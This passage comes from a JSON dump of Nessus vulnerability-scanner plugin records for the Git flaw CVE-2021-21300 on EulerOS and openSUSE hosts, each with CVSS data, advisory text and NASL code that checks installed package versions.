2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-2.23.0-12.h3.eulerosv2r9\",\n \"git-help-2.23.0-12.h3.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:29", "description": "According to the version of the git packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerability :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS,may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS,HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default,and is therefore vulnerable. The problem has been patched in the versions published on Tuesday,March 9th,2021. As a workaound,if symbolic link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`),the described attack won't work. Likewise,if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning),the attack is foiled. As always,it is best to avoid cloning repositories from untrusted sources.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.6.0 : git (EulerOS-SA-2021-1998)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:git-core", "p-cpe:/a:huawei:euleros:git-core-doc", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2021-1998.NASL", "href": "https://www.tenable.com/plugins/nessus/151172", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151172);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\n \"CVE-2021-21300\"\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.6.0 : git (EulerOS-SA-2021-1998)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerability :\n\n - Git is an open-source distributed revision control\n system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS,may\n cause just-checked out script to be executed while\n cloning onto a case-insensitive file system such as\n NTFS,HFS+ or APFS (i.e. the default file systems on\n Windows and macOS). Note that clean/smudge filters have\n to be configured for that. Git for Windows configures\n Git LFS by default,and is therefore vulnerable. The\n problem has been patched in the versions published on\n Tuesday,March 9th,2021. As a workaound,if symbolic link\n support is disabled in Git (e.g. via `git config\n --global core.symlinks false`),the described attack\n won't work. Likewise,if no clean/smudge filters such as\n Git LFS are configured globally (i.e. _before_\n cloning),the attack is foiled. As always,it is best to\n avoid cloning repositories from untrusted\n sources.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1998\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cea65f42\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-2.19.1-1.h9.eulerosv2r8\",\n \"git-core-2.19.1-1.h9.eulerosv2r8\",\n \"git-core-doc-2.19.1-1.h9.eulerosv2r8\",\n \"perl-Git-2.19.1-1.h9.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:50:57", "description": "According to the version of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources.\n The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-01T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.6 : git (EulerOS-SA-2021-2033)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:git-core", "p-cpe:/a:huawei:euleros:git-core-doc", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:uvp:3.0.6.6"], "id": "EULEROS_SA-2021-2033.NASL", "href": "https://www.tenable.com/plugins/nessus/151242", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151242);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\n \"CVE-2021-21300\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : git (EulerOS-SA-2021-2033)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - Git is an open-source distributed revision control\n system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while\n cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on\n Windows and macOS). Note that clean/smudge filters have\n to be configured for that. Git for Windows configures\n Git LFS by default, and is therefore vulnerable. The\n problem has been patched in the versions published on\n Tuesday, March 9th, 2021. As a workaound, if symbolic\n link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack\n won't work. Likewise, if no clean/smudge filters such\n as Git LFS are configured globally (i.e. _before_\n cloning), the attack is foiled. As always, it is best\n to avoid cloning repositories from untrusted sources.\n The earliest impacted version is 2.14.2. The fix\n versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3,\n 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6,\n 2.18.5, 2.17.62.17.6.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2033\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cc2f2a48\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-2.23.0-1.h7.eulerosv2r7\",\n \"git-core-2.23.0-1.h7.eulerosv2r7\",\n \"git-core-doc-2.23.0-1.h7.eulerosv2r7\",\n \"perl-Git-2.23.0-1.h7.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:52", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:2555-1 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-30T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : git (openSUSE-SU-2021:2555-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "p-cpe:/a:novell:opensuse:perl-Git", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-2555.NASL", "href": "https://www.tenable.com/plugins/nessus/152154", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2555-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152154);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"openSUSE 15 Security Update : git (openSUSE-SU-2021:2555-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:2555-1 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1168930\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1183026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1183580\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LNQQ262LF4R2GIO7S7J6NRAUDKV7VGPB/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1181c4ef\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-21300\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'git-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-arch-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-credential-gnome-keyring-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-credential-libsecret-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-cvs-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-daemon-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-email-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-gui-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-p4-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-svn-2.31.1-10.3.1', 'release':'SUSE15.3', 